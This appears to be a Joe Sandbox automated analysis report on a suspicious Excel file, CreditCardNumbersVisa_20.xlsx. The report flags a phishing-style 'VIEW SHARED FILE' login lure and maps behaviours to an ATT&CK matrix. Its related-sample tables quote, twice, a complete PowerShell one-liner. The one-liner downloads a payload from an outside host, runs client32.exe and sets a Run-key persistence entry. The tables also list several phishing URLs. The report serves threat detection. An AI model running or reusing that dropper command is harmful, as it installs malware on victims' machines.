Source: unknownNetwork traffic detected: HTTP traffic on port 52585 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52600 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52636 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52596 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52519 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52586 -> 443
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:52774 version: TLS 1.2
Source: classification engineClassification label: sus24.winXLSX@3/7@0/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$CreditCardNumbersVisa_20.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{851DDD6B-4D79-4C73-80E0-6DD00ADE190A} - OProcSessId.datJump to behavior
Source: CreditCardNumbersVisa_20.xlsxOLE indicator, Workbook stream: true
Source: 8E140000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a0f-f192-11d4-a65f-0040963251e5}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: CreditCardNumbersVisa_20.xlsxInitial sample: OLE zip file path = docProps/custom.xml
Source: 8E140000.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: CreditCardNumbersVisa_20.xlsxInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: Office documentLLM: Page contains button: 'VIEW SHARED FILE' Source: 'Office document'
Source: Office documentLLM: Office document contains prominent button: 'view shared file'
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 867Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Exploitation for Client Execution
1
Browser Extensions
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
bg.microsoft.map.fastly.net0%VirustotalBrowse
s-part-0017.t-0009.t-msedge.net0%VirustotalBrowse
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalseunknown
s-part-0017.t-0009.t-msedge.net
13.107.246.45
truefalseunknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
13.107.246.45
s-part-0017.t-0009.t-msedge.netUnited States
8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1545072
Start date and time:2024-10-30 03:54:29 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 19s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Potential for more IOCs and behavior
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:CreditCardNumbersVisa_20.xlsx
Detection:SUS
Classification:sus24.winXLSX@3/7@0/1
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 52.109.32.97, 184.28.90.27, 52.109.89.19, 52.113.194.132, 199.232.214.172, 20.189.173.10
  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, dns.msftncsi.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, onedscolprdwus09.westus.cloudapp.
  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
TimeTypeDescription
22:56:21API Interceptor887x Sleep call for process: splwow64.exe modified
InputOutput
URL: Office document Model: claude-3-haiku-20240307
```json
{
  "contains_trigger_text": true,
  "trigger_text": "VIEW SHARED FILE",
  "prominent_button_name": "VIEW SHARED FILE",
  "text_input_field_labels": [
    "Email Address",
    "Password"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": true,
  "has_visible_qrcode": false
}
URL: Office document Model: claude-3-haiku-20240307
```json
{
  "brands": [
    "Visa"
  ]
}
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
  • nam.dcv.ms/BxPVLH2cz4
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
s-part-0017.t-0009.t-msedge.nethttps://eot.lps-china.com/f/a/pQ-JA2nitAQtMB92xwUcGg~~/AAAHUQA~/RgRpAabzP4QTAWh0dHBzOi8vYmVyZW5pY2UuZW9tYWlsOC5jb20vdW5zdWJzY3JpYmU_ZXA9MiZsPTVlNmE0MDU2LWVhZTMtMTFlZS1hNzNjLWM1NDU2ZDI0OGQ3OCZsYz0zMmVlMmQ3Yy0zMjA4LTExZWYtYTFiZS1lYjMwYzAwY2FlZDgmcD05NDM1NjNkYy05Mzc2LTExZWYtYTdkMi00NTk0MDQ5OWMzNTYmcHQ9Y2FtcGFpZ24mcHY9NCZzcGE9MTczMDA5MzQ0NCZ0PTE3MzAwOTM1NTUmcz1mNWE2NDYwZWE1NTFlYzYxZDFiNjJhZTBhNTI2NGFhNjdmYWMxN2I1MzRkNWI4MzdhNTA0MDAwM2ZhNmZmMGUwVwVzcGNldUIKZw7zIR9n2KUgilIeZ2VtbWEubG9yZW56b0BkdWJhaWhvbGRpbmcuY29tWAQAAAL5Get hashmaliciousUnknownBrowse
  • 13.107.246.45
https://alcatrazpackages.com/elchapo.htmlGet hashmaliciousUnknownBrowse
  • 13.107.246.45
https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
  • 13.107.246.45
https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
  • 13.107.246.45
file.exeGet hashmaliciousStealc, VidarBrowse
  • 13.107.246.45
https://mailhotcmhakamloops.wordpress.com/Get hashmaliciousUnknownBrowse
  • 13.107.246.45
http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$HRBRG='https://hdlclub2.cc/work/das.php?7387';$VHFTQMWZL=(New-Object%20System.Net.WebClient).DownloadString($HRBRG);$ZLFHWXDCL=%5BSystem.Convert%5D::FromBase64String($VHFTQMWZL);$asd%20=%20Get-Random%20-Minimum%20-5%20-Maximum%2012;%20$ATADDMBRA=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CYWYSGSQHQ'+$asd;if%20(!(Test-Path%20$ATADDMBRA%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$ATADDMBRA%20-ItemType%20Directory%20%7D;$p=Join-Path%20$ATADDMBRA%20'CXCC.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$ZLFHWXDCL);try%20%7B%20%20%20%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$ATADDMBRA)%7D%20catch%20%7B%20%20%20%20Write-Host%20'Failed:%20'%20+%20$_;%20%20%20%20exit%7D;$CV=Join-Path%20$ATADDMBRA%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7BWrite-Host%20'No%20exe.'%7D;$fd=Get-Item%20$ATADDMBRA%20-Force;%20$fd.attributes='Hidden';$s=$ATADDMBRA+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='NXXUI';$ASDASD='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$ASDASD;Get hashmaliciousUnknownBrowse
  • 13.107.246.45
https://frs1sctxxr.shop/1stSourceGet hashmaliciousUnknownBrowse
  • 13.107.246.45
PO-10212024168877 PNG2023-W101.exeGet hashmaliciousGuLoaderBrowse
  • 13.107.246.45
file.exeGet hashmaliciousCredential FlusherBrowse
  • 13.107.246.45
bg.microsoft.map.fastly.nethttps://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/creditodigitalelmo.com.br/solo/i2975ufuy18zkhauvhibzzxy/YWRzQGJldHdlZW4udXM=Get hashmaliciousHTMLPhisherBrowse
  • 199.232.214.172
https://alcatrazpackages.com/elchapo.htmlGet hashmaliciousUnknownBrowse
  • 199.232.214.172
completedfiles.....pdfGet hashmaliciousUnknownBrowse
  • 199.232.214.172
https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
  • 199.232.214.172
https://docs.google.com/uc?export=download&id=1rG5XITnDsiVQCEMAfg1Ex3pDcYxrlv0NGet hashmaliciousUnknownBrowse
  • 199.232.210.172
https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
  • 199.232.214.172
http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$HRBRG='https://hdlclub2.cc/work/das.php?7387';$VHFTQMWZL=(New-Object%20System.Net.WebClient).DownloadString($HRBRG);$ZLFHWXDCL=%5BSystem.Convert%5D::FromBase64String($VHFTQMWZL);$asd%20=%20Get-Random%20-Minimum%20-5%20-Maximum%2012;%20$ATADDMBRA=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CYWYSGSQHQ'+$asd;if%20(!(Test-Path%20$ATADDMBRA%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$ATADDMBRA%20-ItemType%20Directory%20%7D;$p=Join-Path%20$ATADDMBRA%20'CXCC.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$ZLFHWXDCL);try%20%7B%20%20%20%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$ATADDMBRA)%7D%20catch%20%7B%20%20%20%20Write-Host%20'Failed:%20'%20+%20$_;%20%20%20%20exit%7D;$CV=Join-Path%20$ATADDMBRA%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7BWrite-Host%20'No%20exe.'%7D;$fd=Get-Item%20$ATADDMBRA%20-Force;%20$fd.attributes='Hidden';$s=$ATADDMBRA+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='NXXUI';$ASDASD='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$ASDASD;Get hashmaliciousUnknownBrowse
  • 199.232.210.172
https://frs1sctxxr.shop/1stSourceGet hashmaliciousUnknownBrowse
  • 199.232.210.172
http://mhmgc.com/Get hashmaliciousHTMLPhisherBrowse
  • 199.232.210.172
Wcan4j2ldm.dllGet hashmaliciousUnknownBrowse
  • 199.232.214.172
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
MICROSOFT-CORP-MSN-AS-BLOCKUShttps://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
  • 150.171.27.10
file.exeGet hashmaliciousStealc, VidarBrowse
  • 20.96.153.111
https://mailhotcmhakamloops.wordpress.com/Get hashmaliciousUnknownBrowse
  • 13.107.246.44
https://bioaquatictesting-my.sharepoint.com/:f:/g/personal/securedocument_bio-aquatic_com/EqfT1pjHkSVIsZ_uZ-FoAy4BgWwRj-5I-q_oaUpvi5Mxeg?e=eaqeTTGet hashmaliciousUnknownBrowse
  • 52.98.178.210
file.exeGet hashmaliciousStealc, VidarBrowse
  • 20.189.173.23
NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
  • 13.107.246.45
-Payout Salary Benefits.zipGet hashmaliciousHTMLPhisher, Mamba2FABrowse
  • 13.107.246.45
https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFmiRUl-2BtxcZ73D3PC6s7dEdSEpNEVf7BmEr33HzpWyzDy2Qc_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZML5SAWON4OCquRGeOrZOG6X7bKIH2ouDi7O5ssZhkwdV9j8BuAetGO74HzivTb4yjw5AGX5ZMnsGYBS3vBuNNgFYRVSYVxc5dN7eCLDUr43XjgYUZE2GmJzXmN-2BelIHWKsvaOOIeqiW6cnMf2CI6MeEhodwtV2LpZJtWZhkGi5I2rlc08PnxbPlMsOj2Cr9oC-2BCWb9WuPqmZU8rqYD8CNL-2BgY3UElGOq-2BfG3NfYFdrc0Rb11eU0t5G2ihyqzzZVfI-3D#cHNjaG1pdHRAZ3Jpc3Qub3JnGet hashmaliciousUnknownBrowse
  • 150.171.27.10
https://7654658765888767.azurefd.net/mt92CGet hashmaliciousHTMLPhisherBrowse
  • 13.107.246.60
http://199.59.243.227Get hashmaliciousHTMLPhisherBrowse
  • 20.157.217.118
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
28a2c9bd18a11de089ef85a160da29e4https://eot.lps-china.com/f/a/pQ-JA2nitAQtMB92xwUcGg~~/AAAHUQA~/RgRpAabzP4QTAWh0dHBzOi8vYmVyZW5pY2UuZW9tYWlsOC5jb20vdW5zdWJzY3JpYmU_ZXA9MiZsPTVlNmE0MDU2LWVhZTMtMTFlZS1hNzNjLWM1NDU2ZDI0OGQ3OCZsYz0zMmVlMmQ3Yy0zMjA4LTExZWYtYTFiZS1lYjMwYzAwY2FlZDgmcD05NDM1NjNkYy05Mzc2LTExZWYtYTdkMi00NTk0MDQ5OWMzNTYmcHQ9Y2FtcGFpZ24mcHY9NCZzcGE9MTczMDA5MzQ0NCZ0PTE3MzAwOTM1NTUmcz1mNWE2NDYwZWE1NTFlYzYxZDFiNjJhZTBhNTI2NGFhNjdmYWMxN2I1MzRkNWI4MzdhNTA0MDAwM2ZhNmZmMGUwVwVzcGNldUIKZw7zIR9n2KUgilIeZ2VtbWEubG9yZW56b0BkdWJhaWhvbGRpbmcuY29tWAQAAAL5Get hashmaliciousUnknownBrowse
  • 13.107.246.45
https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/creditodigitalelmo.com.br/solo/i2975ufuy18zkhauvhibzzxy/YWRzQGJldHdlZW4udXM=Get hashmaliciousHTMLPhisherBrowse
  • 13.107.246.45
kj5la5X8gv.exeGet hashmaliciousStealcBrowse
  • 13.107.246.45
https://alcatrazpackages.com/elchapo.htmlGet hashmaliciousUnknownBrowse
  • 13.107.246.45
file.exeGet hashmaliciousStealc, VidarBrowse
  • 13.107.246.45
completedfiles.....pdfGet hashmaliciousUnknownBrowse
  • 13.107.246.45
https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
  • 13.107.246.45
https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
  • 13.107.246.45
https://docs.google.com/uc?export=download&id=1rG5XITnDsiVQCEMAfg1Ex3pDcYxrlv0NGet hashmaliciousUnknownBrowse
  • 13.107.246.45
